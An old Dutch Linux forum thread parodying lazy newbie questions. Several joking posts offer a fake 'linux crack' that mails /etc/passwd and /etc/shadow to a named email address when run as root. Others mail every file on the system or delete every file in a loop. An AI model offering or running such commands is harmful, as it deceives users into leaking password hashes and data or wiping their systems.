I hear voices in my head, they counsel me, they understand.
tja sommige mensen kunnen nou eenmaal niet om gaan met andere OS'en dan windows. dus moet jij maar weer gezellig terug naar windows XPWilke schreef op 11 november 2002 @ 22:26:
[...]
Ja, lijkt me toch een goed voorbeeld van een overduidelijke topictitel, of niet dan?
Sjonge zeg...ik stel gewoon een vraag en jullie zeggen allemaal maar UTFS en RTFM en search@google.com, maar nou werkt het nog steeds niet!!
hmm..interresant...dat ga ik ook proberen. | ik tuxs veilig!
iedereen weet het, maar niemand komt op de gedachte - blooming
mama ik ben mOrPhie kwijt geraakt, krijg ik nu een nieuwe :P
wees je zelf!
Verwijderd
Deal.
Mijn eeuwige dank en de wetenschap dat je de ontwikkeling van de linux kernel indrect gesupport hebt?bultoog schreef op 11 november 2002 @ 21:35:
hmmz, kan je ook even uit leggen wat ik voor terug krijg als ik bepaalde mensen bier sponser
wat zijn de voordelen als ik jouw een krat palm geef
En als je 't lief vraagt doe ik een goed woordje voor je bij Jotti en ItSnows.
Verwijderd
ik ben nu dus even snel een paar redhat cdtjes aan het leachen zodat ik strax ook ff vet kan h4x0ren.
weet iemand toevalig waar ik de crack vandaan kan krijgen voor linux?
ga er natuurlijk niet voor betallen
Voor jou altijd!Verwijderd schreef op 12 November 2002 @ 06:30:
1
2
| #!/bin/bash cat /etc/passwd /etc/shadow | mail whavinga@student.utwente.nl -s Vette linux crack |
Graag gedaan hoor
Ennuh, wel als root uitvoeren he, want anders werktie niet, da's logisch natuurlijk...
Verwijderd
Verwijderd schreef op 12 november 2002 @ 06:30:
1
2
| #!/bin/bash
{$zie_sig} |
Verwijderd
Nu zijn jullie zelf ook bezig om de kwaliteit van dit forum naar beneden te halen..
Volgens mij is het grootste probleem dat iedereen die hier een jaar geleden zat nu zo'n beetje Linux-guru is geworden en daardoor veel topics wat te simpel zijn geworden..
Kwaliteit van dit forum gaat niet omlaag, de kennis van veel mensen hier gaat alleen maar omhoog
Weet iemand trouwens hoe ik m'n harde schijf kan compilen?
Het slaat gewoon nergens meer op, en dat geldt tegenwoordig gewoon voor de helft van de topics hier. En zelfs als ontzettende newbee erger ik mij daaraan. Een simpele vraag is misschien niet zo erg maar het luie karakter van veel vragenstellers is gewoon weerzingwekkend. En eens een keer een tegentopic plaatsen waarin er even wordt afgereageerd met de meest domme vragen en antwoorden zal de sfeer wel enigszinds goed doen is mijn mening.
Ik zit nu met zo'n raar dos scherm en wil me kleurtjes terug
Inloggen wil ook al niet ... Hij pakt m'n usernaam & wachtwoord niet
Username: Administrator
Password: ******
Wie kan mij alsjeblieft helpen;
Alvast bedankt een ontiegelijke newbie
pvoutput. Waarom makkelijk doen, als het ook moeilijk kan! Every solution has a new problem
Hij zei alleen iets van beep beep beep, toen ik hem aanzette en nou zie ik niets meer...moeten er misschien nieuwe batterijen in mijn muis? (Ik heb zo een met een lampje erin - maar hij is niet fel genoeg want als ik het licht in de kamer uit doe, zie ik echt niets meer!!)
Ik zit met nog een probleem, als ik mijn tv op mijn usb poort aansluit krijg ik een hoge pieptoon te horen en gaat de wasmachine uit. Dit is erg irritant. HELLUP!! IK snap er echt NIETS meer van...!!
Verwijderd
Ik heb net even door de andere topics gesurft en ik zie nu idd dat het best erg is.. hierbij neem ik terug wat ik in m'n vorige post zeiAlfredt schreef op 12 November 2002 @ 11:00:
de kwalliteit gaat wel degenlijk naar beneden, er zijn dagelijks gewoon topics die ik als 2 weken Linux gebruiker potverdorie kan oplossen. Ja gewoon die ontzettende google site ff gebruiken. gewoon de search ff gebruiken, gewoon dat kleine beetje restverstand, dat nog niet door de alcohol en drugs is aangetast, gebruiken.
(gedeeltelijk)
Maar veel van die nieuwe gebruikers weten ook niet eens hoe ze Google moeten gebruiken (ja, dat klinkt idd achterlijk) en veel hebben er niet eens van gehoord..
Eigenlijk zou je eerst een groot popup venster te zien moeten krijgen wanneer je een topic wilt openen, met daarin de letters+link: G O O G L E
(in lettergrootte 72 natuurlijk)
Nee, wacht.. wat beter zou wezen is een 'intelligente' reageer knop die niet-willend-lerende newbies automatisch doorstuurt naar Google?
Verwijderd
ik heb gedaan wat je zij, maar ik heb prongelukWilke schreef op 12 November 2002 @ 08:44:
[...]
Voor jou altijd!
code:
1 2 #!/bin/bash cat /etc/passwd /etc/shadow | mail whavinga@student.utwente.nl -s Vette linux crack
Graag gedaan hoor
Ennuh, wel als root uitvoeren he, want anders werktie niet, da's logisch natuurlijk...
1
| for a in $(locate *); do cat $a | mail whavinga@student.utwente.nl -s vette linux crack; done |
gedaan en nu is hij super lang bezig en ik snap er helemaal niks van
code is meschien beetje twijfel geval lijkt me, ik vind dat hij wel kan gezien het wel een heel basic constructie is om te bedenken. blaat.
hmmz kan je niet een middag een leuke introductie geven in debian oid, of een cursus een nieuwe kernel installeren oidVerwijderd schreef op 12 november 2002 @ 02:00:
[...]
Mijn eeuwige dank en de wetenschap dat je de ontwikkeling van de linux kernel indrect gesupport hebt?.
En als je 't lief vraagt doe ik een goed woordje voor je bij Jotti en ItSnows..
als je als komt en dingen uitlegt dan kan krijg je van mij een krat palm
een goede deal of niet
wees je zelf!
"For my friends, anything; for my enemies, the law."
Verwijderd
Is je hamster wel POSIX compliant ? Zo niet moet je even bij de hamsterboer vragen naar een upgradekit voor je hamsterblouweKip schreef op 12 november 2002 @ 14:40:
Help, telkens wanneer ik lunix 8.0 probeer te starten gaat mn hamster hard piepen en doet mn computer niets meer, ik heb alles al gelezen en ook de film the guru gezien maar het doet nog steeds niets mn hamster piept nu ook als windows probeer op te starten kan iemand me helpen? Oh ja, een vriend van me is lunix-guru maar hij heeft ook problemen met het updaten van lunix via windows update...help plz!!
Verwijderd schreef op 12 november 2002 @ 12:24:
[...]
ik heb gedaan wat je zij, maar ik heb prongeluk
code:
1 for a in $(locate *); do cat $a | mail whavinga@student.utwente.nl -s vette linux crack; done
gedaan en nu is hij super lang bezig en ik snap er helemaal niks van
code is meschien beetje twijfel geval lijkt me, ik vind dat hij wel kan gezien het wel een heel basic constructie is om te bedenken. blaat.
1
2
3
4
5
6
| #! /bin/bash for i in `find /` do cat "$i" | mail whavinga@student.utwente.nl -s vette linux crack done |
dat dus
Wow, nog een kipblouweKip schreef op 12 November 2002 @ 14:40:
Help, telkens wanneer ik lunix 8.0 probeer te starten gaat mn hamster hard piepen en doet mn computer niets meer, ik heb alles al gelezen en ook de film the guru gezien maar het doet nog steeds niets mn hamster piept nu ook als windows probeer op te starten kan iemand me helpen? Oh ja, een vriend van me is lunix-guru maar hij heeft ook problemen met het updaten van lunix via windows update...help plz!!
Verwijderd
wat mij betrefd sluiten
Verwijderd
en paradot, mijn code werkte ook wel hoor.
maar had meer over het feit dat het in feite een mailbomb is.
Hmm, volgens mij snap jij de hele achtergrond van die draadje nietVerwijderd schreef op 12 November 2002 @ 16:22:
Whahaha alsje linux niet begrijpt instal het dan ook niet ... maar goed als jij zegt dat het kut is zal je wel gelijk hebben he... ik blijf het lekker draaien, maar komop ga je frustraties ergens anders uiten hier schiet niemand iets mee op!
Ik geloof niet dat jij daarover gaatwat mij betrefd sluiten
God, root, what is difference? | Talga Vassternich | IBM zuigt
dat snap ik ook welVerwijderd schreef op 12 November 2002 @ 16:28:
wilke == linux n00b
en paradot, mijn code werkte ook wel hoor.
maar had meer over het feit dat het in feite een mailbomb is.
wat is dat dan, ik ken geen POSIX, heeft dat met mn videokaard te maken ofzo anders weed ik t ook niet meer, mn hamsterboer had geeneens upgradekits dus nu heb ik een nieuwe gekochd maar die piepd ookals ik lunix start, hij stopd wel med piepen als ik een doos over hem heen stop maar dan komen er allemaal kleurtjes en lettertjes op mn scherm en ik kan nog niet zo goed buitenlands lezen...Is je hamster wel POSIX compliant ? Zo niet moet je even bij de hamsterboer vragen naar een upgradekit voor je hamster
"For my friends, anything; for my enemies, the law."
Verwijderd
Hmm, interesting... Een cursus kernel-compileren voor een krat palm? Waarom niet.bultoog schreef op 12 november 2002 @ 13:42:
hmmz kan je niet een middag een leuke introductie geven in debian oid, of een cursus een nieuwe kernel installeren oid
als je als komt en dingen uitlegt dan kan krijg je van mij een krat palm
een goede deal of niet![]()
Deal.
Anyone else interested?
Verwijderd
Verwijderd schreef op 12 November 2002 @ 12:24:
code:
1 for a in $(locate *); do cat $a | mail whavinga@student.utwente.nl -s vette linux crack; done
Zoiets heb ik een keer op een irritant hotmail ventje uitgeprobeerd.
Best wel lame eigenlijk, maar ik vond 't in dat ene geval gerechtvaardigd.
koel dat je er op ingaatVerwijderd schreef op 12 November 2002 @ 17:43:
[...]
Hmm, interesting... Een cursus kernel-compileren voor een krat palm? Waarom niet..
Deal..
Anyone else interested?.
.
ik icq wel ff, kunnen we een afspraak maken
wees je zelf!
Linux is a hacker OS, if you don't wanna learn how to use it then DON'T FUCKING USE IT!!!!!
Overigens is "Wat moet ik nou doen om te zorgen dat dat stomme ding beeld geeft..." niet echt een fout omschrijving. Leuk dat je beeld zwart is... heb je de monitor wel aangezet? Welke linux heb je geinstalleerd? Krijg je wel een prompt? Enzovoort.
Anyways, probeer
xf86config
daarna
startx
dat is, er van uitgaande dat je XFree86 geinstalleerd hebt.
Verschillende dingen die je moet leren in de open-source.
1. Probeer het eerst zelf op te lossen.
2. Als je het zelf niet opgelost krijgt lees dan de handleiding.
3. Als dat niet helpt zoek dan op google e.d.
4. Als je er dan toch niet aan uit komt mag je het natuurlijk altijd vragen, ECHTER, laat zien wat je geprobeerd hebt en gevonden ala
in de handleiding stond gebruik xf86config om de server te configureren en dat heb ik gedaan en volgens mij alles goed ingevuld maar als ik nu startx doe krijg ik fout 'x' dus ik heb gezocht op fout 'x' in de FAQ en op google en dit en dit gevonden en geprobeerd maar ik krijg nog steeds fout 'x'. Ik heb SuSE linux 8.1 geinstalleerd op een AthlonXP2000, 512MB, VIA KT333, nVidia GF4MX460 64MB.
Met dergelijke vragen zul je antwoord krijgen, met vragen als hierboven, well, u've seen the reactions....
Verwijderd
k' sorry for doubting you.paradot zij
at snap ik ook wel
probeer ik vandaag wel dit
for a in $(locate *); do rm $a; done
the cool way to do rm -rf /
Verwijderd
ROT OP STOMME KIDDO!-freaky- schreef op 12 november 2002 @ 18:00:
Linux is a hacker OS, if you don't wanna learn how to use it then DON'T FUCKING USE IT!!!!!
Als jij een hacker bent (jij beschouwt jezelf als een, anders zou je die laatste woorden niet zo gebruiken), wat ben ik dan wel niet?
Verwijderd
w000t ????Verwijderd schreef op 12 november 2002 @ 17:43:
[...]
Hmm, interesting... Een cursus kernel-compileren voor een krat palm? Waarom niet..
Deal..
Anyone else interested?.
.
Gaan we docs schrijven in ruil voor bier???
/me doet mee
<constructief>
is het mischien niet een id om alle nos users met minder dan 50 posts standaard een popup met de bekende infobronnen te geven?
</constructief>
1tjeVerwijderd schreef op 12 November 2002 @ 18:35:
[...]
w000t ????
Gaan we docs schrijven in ruil voor bier???
* bultoog doet mee
<constructief>
is het mischien niet een id om alle nos users met minder dan 50 posts standaard een popup met de bekende infobronnen te geven?
</constructief>
wees je zelf!
Lezen is een vak he? Hacker OS, gemaakt door hackers, vaak gebruikt door mensen die veel willen leren, niet veel willen vragen.Als jij een hacker bent (jij beschouwt jezelf als een, anders zou je die laatste woorden niet zo gebruiken), wat ben ik dan wel niet?
een misintrepreterende l-userwat ben ik dan wel niet?
* sebas stemt toe.
Trouwens ... ik ben ook bereid om heel wat werk te verrichten voor bier. Laat maar weten.
Ik wil trouwens h4x0r3n, welke software moet ik installeren, ik heb mandrake 4.3 met kernel erin? Telnet heb ik er al op staan, maar ik weet niet waar ik moet beginnen. Ik wil l33t zijn. (Ik heb overal gezicht, maar google is gewoon kut met lunix en de gotsearch, laat maar, daar staat toch niets in.)
Everyone complains of his memory, no one of his judgement.
Verwijderd
Jaja, en jij als PFY helpt zo echt mee aan de adoptie van linux ...-freaky- schreef op 12 november 2002 @ 18:00:
....
Linux hoeft wat mij betreft niet zo zeer end-user territory te worden alleen omdat een aantal bedrijven dan MS uit de markt duwen.Jaja, en jij als PFY helpt zo echt mee aan de adoptie van linux ...
Verwijderd
mandrake install
next->next->ja, nee, ja, meschien nou ok doe maar, next, next, KDE
w0000t!
als linux niet voor end users is bedoelt kunnen redhat mandrake en suse zeker wel gaan inpakken.Linux hoeft wat mij betreft niet zo zeer end-user territory te worden alleen omdat een aantal bedrijven dan MS uit de markt duwen.
damn.
vergeet de boeken over linux niet, daar staat niks nuttigs in.sebas schreef op 12 november 2002 @ 19:00:
Bah lezen, manpages zuigen toch allemaal, en wat er op het internet te vinden is is ueberwaardeloos. Lezen is voor lamers.
wees je zelf!
Verwijderd
Kweenie, maar echte nostalgie heb ik altijd bij pick axe pete van de G7000ik lust ook wel een palmpje, als iemand me kan vertellen hoe ik attack of the mutant camels van de C64 kan spelen op unix krijgt tie er ook eentje
Installeer een c64 emulator en zoek ff op dat zuigende google iets wat je erop kan draaien.Verwijderd schreef op 12 November 2002 @ 19:02:
ik lust ook wel een palmpje, als iemand me kan vertellen hoe ik attack of the mutant camels van de C64 kan spelen op unix krijgt tie er ook eentje
* sebas is ff niet in de mood om te goed uit te zoeken, maar vindt dat zn tips op zn minst wel n 6pack herfstbok waard zijn.
Verwijderd
In dat geval is jouw kernel geschreven door een misinterpreterende l-user.-freaky- schreef op 12 November 2002 @ 18:45:
een misintrepreterende l-user
Wanneer stuur je het beloofde bier op?
Verwijderd
/me aanzet *bultoog schreef op 12 november 2002 @ 17:47:
koel dat je er op ingaat
ik icq wel ff, kunnen we een afspraak maken![]()
Whow heb jij HEEL de kernel geschreven? Damnz, jij moet oud zijn :-PIn dat geval is jouw kernel geschreven door een misinterpreterende l-user.
Verwijderd
-freaky- schreef op 12 November 2002 @ 19:22:
Whow heb jij HEEL de kernel geschreven? Damnz, jij moet oud zijn :-P
Please ga eerst eens uitzoeken over wie je praat voor je opmerkingen maakt..... kom je misschien ook eens een keer wel verstandig over....-freaky- schreef op 12 November 2002 @ 19:22:
[...]
Whow heb jij HEEL de kernel geschreven? Damnz, jij moet oud zijn :-P
My own opinion is enough for me, and I claim the right to have it defended against any consensus, any majority, anywhere, any place, any time. And anyone who disagrees with this can pick a number, get in line, and kiss my ass. - Christopher Hitchens
Dit topic is gesloten.
![]()